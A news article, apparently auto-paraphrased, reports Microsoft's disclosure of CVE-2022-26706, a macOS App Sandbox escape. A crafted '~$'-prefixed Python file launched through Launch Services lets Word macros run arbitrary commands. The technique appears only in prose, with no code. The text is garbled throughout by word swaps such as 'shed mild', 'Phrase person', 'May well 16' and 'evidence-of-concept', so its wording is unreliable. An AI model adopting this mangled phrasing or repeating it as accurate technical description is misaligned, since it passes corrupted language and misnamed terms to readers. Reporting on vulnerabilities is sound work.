Hackers could use your Mac to exploit Microsoft Word security flaws
Microsoft has shed mild on a flaw in macOS that, if exploited, could make it possible for threat actors to run arbitrary code, remotely. The flaw, tracked as CVE-2022-26706, enables the circumvention of macOS Application Sandbox rules, enabling macros in Word paperwork to run.
For many years now, macros have been employed by numerous menace actors, to trick men and women into downloading malware (opens in new tab), or ransomware, on their endpoints. It has gotten to a place when Microsoft decided to disable macros on all information outside the reliable network and to make it quite hard for the typical Phrase person to permit them.
Now, Microsoft is warning that the practice can also be applied on MacOS units, as very well:
Executing arbitrary instructions
“Despite the security constraints imposed by the Application Sandbox’s policies on apps, it’s feasible for attackers to bypass the claimed procedures and let destructive codes “escape” the sandbox and execute arbitrary commands on an affected machine,” the firm spelled out.
The flaw was found by the Microsoft 365 Defender Research Group and reportedly fastened by Apple on May well 16.
Application Sandbox is a know-how embedded in macOS, that manages app obtain handle. As the identify implies, its objective is to incorporate any opportunity injury that a destructive application can do, and to safeguard delicate data.
The challenge commences with Word’s backward compatibility. To make guaranteed it will work, the application can examine or produce information with an “~$” refix. By leveraging macOS’s Start Products and services, to operate an open up -stdin command on a specifically crafted Python file with this prefix, the attacker can bypass the sandbox, Microsoft even more explained.
This technique also enables danger actors to bypass “built-in, baseline protection features” in macOS, compromising both technique and consumer details as a outcome.
Microsoft posted a evidence-of-concept, whose code is so very simple that 1 can simply drop a Python file, with the abovementioned prefix, with arbitrary instructions.
“Python happily operates our code, and since it is a child procedure of launchd, it isn’t certain to Word’s sandbox guidelines,” Microsoft reported.
By means of: BleepingComputer (opens in new tab)